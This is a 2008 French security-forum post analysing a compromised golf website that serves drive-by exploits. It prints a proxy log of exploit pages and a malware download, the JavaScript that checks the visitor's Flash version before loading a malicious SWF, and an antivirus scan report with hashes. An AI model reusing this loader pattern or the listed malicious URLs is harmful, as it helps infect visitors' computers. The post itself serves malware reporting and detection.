http://www.golfinau.com/stat/Flash.Swf

Si vous avez trouvé une infection, un lien infectieux etc...
Vous pouvez le donner ici pour inspection.

Modérateur: Mods Windows

http://www.golfinau.com/stat/Flash.Swf

Messagede Malekal_morte » 29 Nov 2008 20:30

Plusieurs exploits sur le site :
Code: Tout sélectionner
1227990727.782     54 192.168.1.120 TCP_MISS/200 893 GET http://www.golfinau.com/stat/Flash.htm - DIRECT/85.17.212.137 text/html
1227990728.103     63 192.168.1.120 TCP_MISS/200 1934 GET http://www.golfinau.com/stat/Ms06014.htm - DIRECT/85.17.212.137 text/html
1227990728.157    104 192.168.1.120 TCP_MISS/200 1743 GET http://www.golfinau.com/stat/Opera.htm - DIRECT/85.17.212.137 text/html
1227990728.161    106 192.168.1.120 TCP_MISS/200 1948 GET http://www.golfinau.com/stat/Ms08053.htm - DIRECT/85.17.212.137 text/html
1227990728.192     55 192.168.1.120 TCP_MISS/200 2986 GET http://www.golfinau.com/stat/Ms07055.htm - DIRECT/85.17.212.137 text/html
1227990728.787     55 192.168.1.120 TCP_MISS/200 2694 GET http://www.golfinau.com/stat/Djvu.htm - DIRECT/85.17.212.137 text/html
1227990728.839    102 192.168.1.120 TCP_MISS/200 9779 GET http://www.golfinau.com/stat/swfobject.js - DIRECT/85.17.212.137 application/javascript
1227990729.151    193 192.168.1.120 TCP_MISS/200 62807 GET http://www.golfinau.com/stat/taskmgr.exe - DIRECT/85.17.212.137 application/x-msdownload


Flash.htm test la version du player flash :
Code: Tout sélectionner
<script type="text/javascript" src="swfobject.js"></script>
<div id="flashcontent">Loadin...</div><div id="flashversion">Loading...</div>
<script type="text/javascript">
var game="flashcontent";
var version=deconcept.SWFObjectUtil.getPlayerVersion();if(version['major']==9){
document.getElementById('flashversion').innerHTML="";
if(version['rev']==115){
var so=new SWFObject("Flash.swf","mymovie","0.1","0.1","9","#000000");so.write(game)
}else if(version['rev']>=124){
if(document.getElementById){
document.getElementById('flashversion').innerHTML=""}}}
</script>


Les PDF et SWF toujours aussi bien détectés PDT_040

Fichier Flash.swf reçu le 2008.11.29 19:25:37 (CET)
Situation actuelle: en cours de chargement ... mis en file d'attente en attente en cours d'analyse terminé NON TROUVE ARRETE
Résultat: 7/37 (18.92%)

Antivirus Version Dernière mise à jour Résultat
AhnLab-V3 2008.11.28.2 2008.11.29 Win-Trojan/Exploit-SWF.Gen
AntiVir 7.9.0.36 2008.11.28 EXP/Flash.Gen
Authentium 5.1.0.4 2008.11.28 -
Avast 4.8.1281.0 2008.11.28 SWF:CVE-2007-0071
AVG 8.0.0.199 2008.11.29 -
BitDefender 7.2 2008.11.29 Exploit.SWF.Gen
CAT-QuickHeal 10.00 2008.11.29 -
ClamAV 0.94.1 2008.11.29 -
DrWeb 4.44.0.09170 2008.11.29 -
eSafe 7.0.17.0 2008.11.27 -
eTrust-Vet 31.6.6234 2008.11.28 -
Ewido 4.0 2008.11.29 -
F-Prot 4.4.4.56 2008.11.28 -
F-Secure 8.0.14332.0 2008.11.29 -
Fortinet 3.117.0.0 2008.11.29 -
GData 19 2008.11.29 Exploit.SWF.Gen
Ikarus T3.1.1.45.0 2008.11.29 -
K7AntiVirus 7.10.538 2008.11.29 -
Kaspersky 7.0.0.125 2008.11.29 -
McAfee 5448 2008.11.28 -
McAfee+Artemis 5448 2008.11.28 -
Microsoft 1.4104 2008.11.29 Exploit:Win32/APSB08-11.gen!A
NOD32 3650 2008.11.28 -
Norman 5.80.02 2008.11.28 -
Panda 9.0.0.4 2008.11.29 -
PCTools 4.4.2.0 2008.11.29 -
Prevx1 V2 2008.11.29 -
Rising 21.05.52.00 2008.11.29 -
SecureWeb-Gateway 6.7.6 2008.11.28 Exploit.Flash.Gen
Sophos 4.36.0 2008.11.29 -
Sunbelt 3.1.1832.2 2008.11.27 -
Symantec 10 2008.11.29 -
TheHacker 6.3.1.1.166 2008.11.28 -
TrendMicro 8.700.0.1004 2008.11.28 -
VBA32 3.12.8.9 2008.11.29 -
ViRobot 2008.11.29.1492 2008.11.29 -
VirusBuster 4.5.11.0 2008.11.29 -
Information additionnelle
File size: 17944 bytes
MD5...: ec8b8d29800d7c9745e4e1143775c057
SHA1..: 2a0005c9065c5bf7ad4a5a584a98fb83336604b2
Première régle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)
Marre des Virus? Passez à GNU/Linux!
Soutenez malekal.com en effectuant un don!
Image
- spamhere-@wanadoo.fr - http://fofo.dyndns.org

* Ce n'est pas parce que les lendemains qui devaient chanter ont déchanté que le futur s'écrit au passé *
Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
 
Messages: 44564
Inscription: 10 Sep 2005 13:57

Retourner vers Remontées d'infection : fichiers infectieux, liens infectieux etc.

Qui est en ligne

Utilisateurs parcourant ce forum: Aucun utilisateur enregistré et 1 invité

Partenaires du site : Geekeden - OxygenePC.com - Les partenaires du site
Hadopi vous surveille McAfee you Suck Securiser votre ordinateur contre les menaces